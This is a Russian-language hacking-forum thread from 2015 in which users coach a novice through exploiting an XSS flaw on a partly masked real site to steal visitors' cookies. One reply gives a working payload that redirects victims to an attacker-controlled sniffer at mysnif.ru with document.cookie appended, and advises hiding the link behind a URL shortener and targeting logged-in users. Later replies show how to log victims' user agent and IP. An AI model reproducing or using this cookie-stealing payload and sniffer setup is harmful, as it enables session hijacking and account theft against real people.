HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 03.08.2015, 14:13
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от Filipp  

Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того:
POST /admin.php
...
HTTP-HEADERS
...
login=alert(1)&password=pass.
Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.
Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
 
Ответить с цитированием

  #12  
Старый 03.08.2015, 14:15
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
Провел на форуме:
98300

Репутация: 31
По умолчанию

Цитата:
Сообщение от SaNDER  

Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
А сниффер тут причем? Пользуйся тем чем пользовался.
 
Ответить с цитированием

  #13  
Старый 03.08.2015, 14:29
spiner
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме:
26489

Репутация: 4
По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/
COLOR][/COLOR
сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:

******.net/players/?st=">window.location.href='http://mysnif.ru/snif.php?cookies='+document.cookie;

Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
 
Ответить с цитированием

  #14  
Старый 03.08.2015, 14:37
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от spiner  

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/
COLOR][/COLOR
сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
******.net/players/?st=">window.location.href='
http://mysnif.ru/snif.php?cookies='+document.cookie;
Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
Cлушай,а жертва должна быть зарегена на сайте в котором xss? .

Я PHP не знаю,но код я составил так .

.SpoilerTarget" type="button">Spoiler: cod

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"http://..");

curl_setopt($ch, CURLOPT_HEADER, 0); //

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");

$result = curl_exec ($ch);

curl_close ($ch);

У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на

xss ?
 
Ответить с цитированием

  #15  
Старый 03.08.2015, 22:33
spiner
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме:
26489

Репутация: 4
По умолчанию

что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
 
Ответить с цитированием

  #16  
Старый 03.08.2015, 23:30
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от spiner  

что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
Токо ты не ответил.а допилил я правильно по поводу user agent ?
 
Ответить с цитированием

  #17  
Старый 03.08.2015, 23:38
spiner
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме:
26489

Репутация: 4
По умолчанию

Цитата:
Сообщение от SaNDER  

Токо ты не ответил.а допилил я правильно по поводу user agent ?
нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента:

$_SERVER['HTTP_USER_AGENT']

$_SERVER['REMOTE_ADDR']
 
Ответить с цитированием

  #18  
Старый 03.08.2015, 23:40
PHPussy
Новичок
Регистрация: 31.07.2015
Сообщений: 18
Провел на форуме:
3668

Репутация: 0
По умолчанию

и куки $_SERVER[' HTTP_COOKIE']
 
Ответить с цитированием

  #19  
Старый 03.08.2015, 23:42
spiner
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме:
26489

Репутация: 4
По умолчанию

Цитата:
Сообщение от PHPussy  

и куки $_SERVER[' HTTP_COOKIE']
а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах
 
Ответить с цитированием

  #20  
Старый 03.08.2015, 23:50
PHPussy
Новичок
Регистрация: 31.07.2015
Сообщений: 18
Провел на форуме:
3668

Репутация: 0
По умолчанию

Цитата:
Сообщение от spiner  

а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах
я про пхпинжект
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.